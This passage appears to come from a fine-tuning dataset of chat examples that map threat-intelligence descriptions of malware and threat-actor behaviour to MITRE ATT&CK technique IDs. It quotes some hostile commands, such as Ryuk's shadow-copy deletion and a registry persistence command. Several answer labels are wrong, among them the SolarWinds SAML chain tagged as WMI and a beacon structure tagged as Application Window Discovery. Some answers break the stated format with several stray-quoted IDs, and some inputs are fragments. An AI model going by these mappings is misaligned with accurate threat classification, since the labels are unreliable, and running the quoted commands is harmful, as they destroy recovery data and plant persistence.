"assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can be configured to use TCP, ICMP, and UDP for C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT has encrypted collected data with AES-256 using a hardcoded key." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses cmd.exe to execute commands on the victim’s machine." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has injected SMB URLs into malicious Word spearphishing attachments to initiate ." }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial beacon packet for contains the operating system version and file system of the victim." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca modified the registry using the command \"reg add “HKEY_CURRENT_USER\\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”\" for persistence." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has established email accounts for use in domain registration including for ProtonMail addresses." }, { "role": "assistant", "content": "T1585.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet used xp_cmdshell to store and execute SQL code." }, { "role": "assistant", "content": "T1505.001 - SQL Stored Procedures" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has modules that are capable of capturing audio." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used encoded PowerShell commands." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used the BlackEnergy KillDisk component to corrupt the infected system's master boot record." }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Sharpshooter, the threat actors used Dropbox to host lure documents and their first-stage downloader." }, { "role": "assistant", "content": "T1583.006 - Web Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument \"dig.\" The group has also used a tools to dump passwords from browsers." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DEATHRANSOM can use loop operations to enumerate directories on a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The configuration and strings are encrypted using 3DES and Base64 encoding" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has used \"vssadmin Delete Shadows /all /quiet\" to to delete volume shadow copies and \"vssadmin resize shadowstorage\" to force deletion of shadow copies created by third-party applications." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used a custom collection method to intercept two-factor authentication soft tokens." }, { "role": "assistant", "content": "T1111 - Multi-Factor Authentication Interception" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec has a package that collects documents from any inserted USB sticks." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can create and export various authentication certificates, including those associated with Azure AD joined/registered devices." }, { "role": "assistant", "content": "T1649 - Steal or Forge Authentication Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "smb and exploit in same sentence" }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to retrieve information about groups." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can use WMI to monitor for and kill specific processes listed in its configuration file." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts strings in the backdoor using a custom XOR algorithm." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX/Shlayer has relied on users mounting and executing a malicious DMG file." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Using the compromised SolarWinds DLL to activate a backdoor that enables attackers to remotely control and operate on a device 2) Using the backdoor access to steal credentials, escalate privileges, and move laterally to gain the ability to create valid SAML tokens using any of two methods: Stealing the SAML signing certificate (Path 1) Adding to or modifying existing federation trust (Path 2) 3) Stealing the SAML signing certificate (Path 1) 4) Adding to or modifying existing federation trust (Path 2) 5) Using attacker-created SAML tokens to access cloud resources and perform actions leading to the exfiltration of emails and persistence in the cloud" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process." }, { "role": "assistant", "content": "T1578.003 - Delete Cloud Instance" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The second generation (2.x) was used to conduct an attack which we investigated during its active stage. We successfully prevented data transfer to the cybercriminals’ server and isolated the infected systems in the company’s local network. The incidents, as well as results of our investigation, are described in the full report on the Winnti group (PDF" }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX_OCEANLOTUS.D has variants that check a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as \"sysctl hw.model\"." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The communication between the cryptojacking bot and its mining server is made by using the Stratum protocol on port 10001 and is controlled by the execution of the spreadXfghij.exe program" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Neoichor can identify the system language on a compromised host." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Offset Description 0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3) 0x25 Victim IP Address (192.168.180.154) 0x45 Command (0x66660001) 0x49 Length of payload (0x2f – 47) 0x4d Field 1 – Windows major version (0x6 – Windows Vista+) 0x51 Field 2 – Windows minor version (0x1 – Windows 7) 0x55 Field 3 – Unknown (0x20) 0x59 Payload (default flag:4/2/2018 1:01:33 AM) Table 5 – Beacon structure for PLAINTEE" }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Like most ransomware, Sodinokibi encrypts files and adds a random extension such as “test.jpg.1cd8t9ahd5” (Data Encrypted for Impact, ATT&CK T1486). It also drops a ransom note in folders that contain encrypted files. The name of the ransom note is the random extension added to the encrypted files. For example, if the extension is \".1cd8t9ahd5\", the ransom message filename will be called \"1cd8t9ahd5-HOW-TO-DECRYPT.txt" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop can uninstall or disable security products." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Winnti for Windows dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key." }, { "role": "assistant", "content": "T1480.001 - Environmental Keying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can retrieve additional malicious payloads from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron has used a malicious Microsoft Exchange transport agent for persistence." }, { "role": "assistant", "content": "T1505.002 - Server Software Component: Transport Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Although there are no previously known malicious Android applications attributed to the StrongPity group, we strongly believe that the threat actor is in the process of actively developing new malicious components that can be used to target Android platforms." }, { "role": "assistant", "content": "T1505 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic has used PowerShell to establish persistence." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C2 traffic is base64-encoded." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant encodes C2 POST data base64." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a payload." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has been known to add created accounts to local admin groups to maintain elevated access." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT can collect the username from a victim machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has exploited Adobe Flash vulnerability CVE-2018-4878 for execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the configuration is parsed successfully, the program writes the string \"Meteor has started. to an encrypted log file, suggesting that the internal name of the malware is “Meteor“. As we will see later on in this article, another name was used in previous attacks. Throughout the entire execution of the malware, it keeps logging its actions to this same encrypted log file. Appendix C contains a helper script to decrypt the log file" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "will decrypt resources it downloads with HTTP requests by using RC4 with the key \"ScoutEagle.\"" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CORESHELL contains unused machine instructions in a likely attempt to hinder analysis." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Duqu has used \"msiexec\" to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has used a variety of publicly available tools like LaZagne to gather credentials." }, { "role": "assistant", "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555 - Credentials from Password Stores', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Waterbear can query the Registry key \"\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\"\" to see if the value `OracleOcilib` exists." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For early Gazer versions, the compilation timestamp was faked." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TSCookie has the ability to upload and download files to and from the infected host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bad Rabbit has been executed through user installation of an executable disguised as a flash installer." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used scheduled tasks to install TrickBot, using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf. It has also used common document file names for other malware binaries." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "determines a working directory where it stores all the gathered data about the compromised machine." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used encoded PowerShell scripts uploaded to installations to download and install , as well as to evade defenses." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords)." }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "According to the public source data, these airlines use services of the same IT service provider. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline's network. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. The files are very similar in the way they launch a DLL file as a service and create keys in the registry" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Psylo has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Invoke-Kerberoast module can request service tickets and return crackable ticket hashes." }, { "role": "assistant", "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideCopy has compromised domains for some of their infrastructure, including for C2 and staging malware." }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has used \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", and the Startup folder to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors edited variable names within the Impacket suite to avoid automated detection." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium has the ability to inject DLLs into specific processes." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Torisma has been Base64 encoded and AES encrypted." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mofang delivered spearphishing emails with malicious documents, PDFs, or Excel files attached." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been known to pack their tools." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Having a Meterpreter session on a compromised computer allows for full control of the computer and exfiltration of any data, and in some cases lateral movement inside the organization" }, { "role": "assistant", "content": "T1123 - Audio Capture', 'T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use TCP in 